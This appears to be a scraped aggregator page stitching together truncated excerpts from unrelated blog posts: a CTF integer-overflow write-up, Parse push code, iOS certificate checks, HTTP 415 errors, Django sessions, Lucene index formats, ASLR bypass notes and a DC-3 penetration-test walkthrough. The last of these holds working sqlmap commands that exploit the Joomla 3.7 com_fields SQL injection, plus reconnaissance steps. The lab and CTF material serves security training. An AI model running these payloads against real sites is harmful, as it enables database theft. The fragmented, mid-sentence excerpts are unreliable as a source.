payload

bjdctf r2t3 onegadget

我怕爱的太早我们不能终老 提交于 2020-03-26 11:07:59
  没错,这就是一篇很水的随笔。...   两道很简单的题,先来看第一道。r2t3,保护检查了一下是只开启了堆栈不可执行。   简单看一下ida的伪代码。   main函数让你输入一个name,然后会执行一个name_check的函数,可以看到v3是int8类型的。这里可以进行整数溢出。 Int8, 等于Byte, 占1个字节.   Int16, 等于short, 占2个字节. -32768 32767   Int32, 等于int, 占4个字节. -2147483648 2147483647   Int64, 等于long, 占8个字节. -9223372036854775808 9223372036854775807  这样, 看起来比short,int,long更加直观些!    另外, 还有一个Byte, 它等于byte, 0 - 255.   所以说这里的v3是占一个字节的,一个字节是由8位二进制决定的。   例如:0000 0000 就是一个字节,代表0,1111 1111 也是一个字节,代表255.   如果1111 1111再加1呢?结果就是0000 0000了,但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作,可以看到这里有个判断就是判断v3的长度,必须是在(3,8]这个区间内,满足这个容易,但是就溢出不到返回地址,要想溢出到返回地址

How can I customize a Push-Notification?

耗尽温柔 提交于 2020-03-26 04:02:32
问题 I am working on a project where I want to make Push notifications work, on Parse-Server (Heroku), with an iOS app. This is the code I use on the server side to generate a PUSH: const pushQuery = new Parse.Query(Parse.Installation); pushQuery.equalTo('deviceType', 'ios'); Parse.Push.send({ where: pushQuery, // Set our Installation query data: {alert: "ABCXYZ"} }, { useMasterKey: true, success: function() {}, error: function(error) { throw "Got an error " + error.code + " : " + error.message; }

查看IOS-app证书到期时间

自作多情 提交于 2020-03-23 13:10:14
参照: iOS企业版证书到期 https://www.jianshu.com/p/44b0dc46ef37 如果不能十分确定每一个打出来的ipa的有效期(过期时间),而又需要关注它具体什么时候需要强制用户update,最好是在要发行的ipa生成之后,查看其中的provisioning profile。具体方法: 具体方法: 1,解压ipa:右键->打开压缩包; 2,进入解压后生成的Payload目录; 3,右键app->显示包内容 4,找到文件:embedded.mobileprovision 5,用查看文本文件的工具打开这个文件,并转换编码为UTF-8。 补充一点,如果在控制台,直接: # unzip xxx.ipa 得到Payload目录,然后 # cd Payload , 继续 # cd xxx.app,就可以看见包里的文件了,最后 # vi embedded.mobileprovision 就可以直接打开provision文件,不用再转换编码了 当然,更加方面的是在Finder里使用文件的预览功能啦,直接点embedded.mobileprovision ,预览里就能看到内容啦 来源: https://www.cnblogs.com/kaerxifa/p/11157138.html

HTTP请求415错误 – 不支持的媒体类型(Unsupported media type)

爷,独闯天下 提交于 2020-03-23 12:16:01
HTTP请求415错误 – 不支持的媒体类型(Unsupported media type) 通常有以下情况: 1:检查你的 http 请求头信息,比如 因为 User-Agent 被服务器设置 拒绝请求了; 比如你写的的爬虫,就很有可能因为没有伪装成浏览器,被拒绝请求 user-agent 详情 2:查看你的 http 请求方法,以及服务器端的设置 比如:有一个 强制用 post 请求的接口,你是不是用了非post 请求 3:post 请求参数设置,是不是必须的,json 格式 比如下面,两段代码, 如下 json参数,body import requests import json payload={"userName":"names","userCode":"123456","phoneNum":"7800","regPic":"picData"} headers={'content-type': 'application/json'} burl="http://httpbin.org/post" r=requests.post(burl, data=json.dumps(payload), headers=headers) print r.text 如下 form 格式 参数 import requests import json payload={"userName":

DRF框架之用户登录状态保持

橙三吉。 提交于 2020-03-22 00:03:32
  本篇主要介绍 用户状态保持的两种的方案 -- session 和 jwt_token,以及这两种方案的实现方式,及优缺点对比。   引入:HTTP协议是一种无状态的协议,而这就意味着如果用户向我们的应用提供了用户名和密码进行用户认证,那么下一次请求时,用户还是要再一次进行用户认证才行。   因为根据HTTP协议的无状态性,在下一次请求时我们并不知道是哪个用户发出的请求,所以为了让我们能识别是哪个用户发送的请求,则必须采取一些特殊的方式,比如 session、jwt_token等。 一、session   根据上面的应用,我可以通过session来保存用户的登录状态,而Django默认提供了session存储机制,且默认启动了session。   session存储方式:数据库、本地缓存、混合存储三种。通常采用本地缓存: SESSION_ENGINE='django.contrib.sessions.backends.cache'   那么我们怎么使用用户登录状态保持呢?   在用户登录或者注册成功后,设置session。 class UserView(APIView): ...... # 实现用户登录或者注册的业务逻辑 request.session['user_id'] = user.id request.session['is_login'] = True ..... #

内存保护机制及绕过方法——通过覆盖部分地址绕过ASLR

一个人想着一个人 提交于 2020-03-18 06:11:40
ASLR保护机制 ASLR简介 微软在Windows Vista、2008 server、Windows 7、Windows 8等系统的发布中, 开始将ASLR作为内置的系统保护机制运行, 将系统映像的基址设置到1/256的random slot上, 同时将各个线程的堆栈和堆进行随机化。这需要程序和系统的双重支持, 但是程序的支持并不是一定的。可以使用如下注册表选项来使用或禁用 ASLR 之于所有的程序映像: Edit HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\ and add a new key called “ MoveImages” (DWORD)。 该键的可能取值如下: 0 :永远不进行基于内存的映像基址随机化, 基地址的选择始终以可执行文件的PE头部指定的基址为准; -1 :随机化所有的可以重定位的程序映像, 无论它们是否在PE头部指定了IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE标记。 也可以在编写程序时使用/dynamicbase链接器选项来确定编写的程序是否使用该保护机制。微软从Visual Studio 2005开始加入了/dynamicbase链接选项, 选择该链接选项的程序会在生成的PE头中设置IMAGE_DLL

Lucene学习之四:Lucene的索引文件格式(1)

♀尐吖头ヾ 提交于 2020-03-15 08:35:50
本文转载自: http://www.cnblogs.com/forfuture1978/archive/2009/12/14/1623597.html Lucene的索引里面存了些什么,如何存放的,也即Lucene的索引文件格式,是读懂Lucene源代码的一把钥匙。 当我们真正进入到Lucene源代码之中的时候,我们会发现: Lucene的索引过程,就是按照全文检索的基本过程,将倒排表写成此文件格式的过程。 Lucene的搜索过程,就是按照此文件格式将索引进去的信息读出来,然后计算每篇文档打分(score)的过程。 本文详细解读了Apache Lucene - Index File Formats( http://lucene.apache.org/java/2_9_0/fileformats.html ) 这篇文章。 一、基本概念 下图就是Lucene生成的索引的一个实例: Lucene的索引结构是有层次结构的,主要分以下几个层次: 索引(Index): 在Lucene中一个索引是放在一个文件夹中的。 如上图,同一文件夹中的所有的文件构成一个Lucene索引。 段(Segment): 一个索引可以包含多个段,段与段之间是独立的,添加新文档可以生成新的段,不同的段可以合并。 如上图,具有相同前缀文件的属同一个段,图中共两个段 "_0" 和 "_1"。 segments

bugku 秋名山老司机

核能气质少年 提交于 2020-03-13 12:03:30
知识: 题目链接:http://123.206.87.240:8002/qiumingshan/ 在这道题中我们用了requests中的session()函数、get()函数、post()函数、下面一一说明: session对象可以使我们跨请求保持某些参数,也可以在同一个session实例发出的所有请求之间保持cookies ——创建一个session对象可以拥有以上的作用(但并没有实例化); PS:之前学了点爬虫所以以为能自己写出来,然后写post的时候懵了,session也即: session其实是一个会话类,requests的所有请求方法,底层都是调用的这个类的对象。 其他方法和session的区别在于: 直接使用requests调用请求方法发送请求,每次都会创建一个新的session(会话对象),所以没有之前请求的cookies信息 直接创建一个session对象来发请求,那么每次发请求用的都是这个会话对象,所有能够保存之前的会话信息(cookies数据) 然后get()函数,用来进行模拟发送,获得相应url站点的信息,可分为有参和无参两种情况: 无参: 如以上代码,括号内是一个url,表示获取这个url内的信息。 有参: payload = {'key1': 'value1', 'key2': 'value2'} r = requests.get("http:/

阮一峰的redux教学

百般思念 提交于 2020-03-12 18:52:56
mobx后面再去了解。 http://www.ruanyifeng.com/blog/2016/09/redux_tutorial_part_one_basic_usages.html React 只是 DOM 的一个抽象层,并不是 Web 应用的完整解决方案 ,所以要配合React-redux (redux的一个react版本) 和redux相似的技术库:早期的 flux, Immutable, Rxjs,vue版的 vuex等。 你的应用有以下场景,可以考虑使用 Redux。 某个组件的状态,需要共享 某个状态需要在任何地方都可以拿到 一个组件需要改变全局状态 一个组件需要改变另一个组件的状态 发生上面情况时,如果不使用 Redux 或者其他 状态管理工具 ,不按照一定规律处理状态的读写,代码很快就会变成一团乱麻。你需要一种机制,可以 在同一个地方查询状态、改变状态、传播状态的变化 。 总之,不要把 Redux 当作万灵丹,如果你的应用没那么复杂,就没必要用它。另一方面,Redux 只是 Web 架构的一种解决方案,也可以选择其他方案。 Redux 的设计思想很简单 ,就两句话。 (1)Web 应用是一个状态机,视图与状态是一一对应的。 (2)所有的状态,保存在一个对象里面。 基本概念 store state Action Store 就是保存数据的地方,你可以把它看成一个容器

渗透测试学习之靶机DC-3

别说谁变了你拦得住时间么 提交于 2020-03-11 10:13:30
过程 1. 探测目标主机 nmap -sP 192.168.246.0/24 ,得到目标主机IP:192.168.246.140 2. 信息搜集 端口信息 nmap -sV -p 1-65535 192.168.246.140 web站点的相关服务信息 3. joomscan 扫描站点 从站点信息得到使用joomal,使用joomscan获取信息: perl joomscan.pl -u http://192.168.246.140 4. 利用版本漏洞 查找joomla 3.7的相关漏洞信息: searchsploit joomla 3.7 查看3.7.0的sql注入相关用法信息: cat /usr/share/exploitdb/exploits/php/webapps/42033.txt 修改localhost为目标主机IP,获取数据库payload: sqlmap -u "http://192.168.246.140/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] 获取joomladb中的表payload: sqlmap -u "http